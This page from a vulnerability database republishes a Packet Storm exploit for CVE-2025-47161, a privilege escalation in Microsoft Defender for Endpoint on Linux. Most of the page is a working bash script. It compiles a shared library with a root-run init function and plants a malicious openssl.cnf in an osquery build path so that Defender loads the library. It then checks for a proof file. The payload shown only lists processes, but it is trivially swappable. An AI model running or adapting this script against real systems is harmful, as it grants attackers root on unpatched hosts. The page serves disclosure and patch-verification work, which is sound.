Lucene search
+L

📄 Microsoft Defender for Endpoint Privilege Escalation

🗓️ 09 Jul 2025 00:00:00Reported by Rich MirchType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 102 Views

Privilege escalation exploit in Microsoft Defender for Endpoint (CVE-2025-47161) on Linux.

Related
Code
#!/bin/bash
    # Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
    # Date: 2025-05-27
    # Exploit Author: Rich Mirch
    # Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
    # Software Link:
    https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
    # Versions:
    # Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
    # Vulnerable Feb-2025 Build: 101.24122.0008  20.124112.0008.0
    # Vulnerable Feb-2025 Build: 101.24112.0003  30.124112.0003.0
    # Vulnerable Jan-2025 Build: 101.24112.0001   30.124112.0001.0
    # Vulnerable Jan-2025 Build: 101.24102.0000  30.124102.0000.0
    #
    # Vendor Advisory:
    https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
    # Blog: http://stratascale.com/vulnerability-alert-cve202547161
    # Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
    # CVE : CVE-2025-47161
    #
    echo "MDE Version: $(mdatp version)"
    
    # stage
    cat >mde-exp.c<<EOF
    /*
    * Build procedure:
    * gcc -fPIC -o woot.o -Wall -c woot.c
    * gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
    */
    #include <stdlib.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/stat.h>
    
    void woot(){
        // for manual testing
        if(isatty(STDERR_FILENO)) {
            fprintf(stderr,"Woot!\n");
        }
        system("ps -ef > /woot.txt");
        sleep(3000000);
    }
    
    EOF
    
    # build exploit
    gcc -fPIC -o woot.o -Wall -c mde-exp.c
    gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
    
    mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/
    
    cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
    <<EOF
    # Malicious openssl.cnf
    openssl_conf = openssl_init
    [openssl_init]
    engines = engine_section
    
    [engine_section]
    woot = woot_section
    
    [woot_section]
    engine_id = woot
    dynamic_path = /tmp/woot.so
    init = 0
    EOF
    
    echo "Checking every 15 seconds for /woot.txt"
    while true
    do
        if [[ -f /woot.txt ]]
        then
            echo "WOOT - /woot.txt exists"
        ls -ld /woot.txt
        exit
        fi
        sleep 15
    done

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jul 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.8
EPSS0.00705
SSVC
102